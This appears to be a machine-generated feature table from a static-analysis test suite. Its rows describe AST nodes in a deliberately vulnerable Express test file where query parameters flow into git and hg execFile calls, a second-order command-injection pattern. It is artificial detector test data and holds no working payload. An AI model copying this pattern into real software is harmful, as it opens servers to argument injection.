execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | exceptional return of ["ls-re ... erArgs) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:19:35:77 | exceptional return of ["ls-re ... erArgs) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:20:35:30 | "ls-remote" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:35 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:35 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:35 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:35 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:35 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:41 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:41 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:41 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:41 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:41 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:33:35:48 | req.query.remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:37:35:41 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:37:35:41 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:37:35:41 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:37:35:41 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:37:35:41 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:43:35:48 | remote | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:43:35:48 | remote | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:43:35:48 | remote | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:43:35:48 | remote | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:43:35:48 | remote | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:51:35:56 | concat | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:51:35:56 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:51:35:56 | concat | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:51:35:56 | concat | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:51:35:56 | concat | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:60 | req | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:60 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:60 | req | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:60 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:60 | req | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:66 | req.query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:66 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:66 | req.query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:66 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:66 | req.query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:76 | req.query.otherArgs | CalleeFlexibleAccessPath | ?.concat | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:76 | req.query.otherArgs | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:76 | req.query.otherArgs | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:76 | req.query.otherArgs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:76 | req.query.otherArgs | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:76 | req.query.otherArgs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:58:35:76 | req.query.otherArgs | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:62:35:66 | query | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:62:35:66 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:62:35:66 | query | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:62:35:66 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:62:35:66 | query | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:68:35:76 | otherArgs | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:68:35:76 | otherArgs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:68:35:76 | otherArgs | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:68:35:76 | otherArgs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:35:68:35:76 | otherArgs | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:10 | execFile | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:10 | execFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:10 | execFile | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:10 | execFile | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:10 | execFile | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | exceptional return of execFil ... rable)) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | exceptional return of execFil ... rable)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | exceptional return of execFil ... rable)) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | exceptional return of execFil ... rable)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | exceptional return of execFil ... rable)) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | execFil ... rable)) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | execFil ... rable)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | execFil ... rable)) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | execFil ... rable)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:3:37:65 | execFil ... rable)) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:12:37:16 | "git" | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:32 | ["add", "fpp"] | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:32 | ["add", "fpp"] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:32 | ["add", "fpp"] | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:32 | ["add", "fpp"] | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:32 | ["add", "fpp"] | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:39 | ["add", ... .concat | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:39 | ["add", ... .concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:39 | ["add", ... .concat | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:39 | ["add", ... .concat | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:39 | ["add", ... .concat | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | CalleeFlexibleAccessPath | execFile | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | ["add", ... erable) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | exceptional return of ["add", ... erable) | contextFunctionInterfaces | indirect(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | exceptional return of ["add", ... erable) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | exceptional return of ["add", ... erable) | enclosingFunctionBody | req res remote req query remote execFile git ls-remote remote execFile git fetch remote indirect git ls-remote remote myArgs req query args execFile git myArgs remote startsWith -- execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD remote startsWith git@ execFile git ls-remote remote HEAD execFile git ls-remote remote HEAD execFile git req query args execFile git add req query args execFile git add req query remote concat otherargs execFile git ls-remote req query remote concat req query otherArgs execFile git add fpp concat req query notVulnerable execFile hg clone req query remote execFile hg whatever req query remote execFile hg req query args execFile hg clone -- req query remote | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | exceptional return of ["add", ... erable) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:19:37:64 | exceptional return of ["add", ... erable) | fileImports | child_process express | +| autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:37:20:37:24 | "add" | contextFunctionInterfaces | 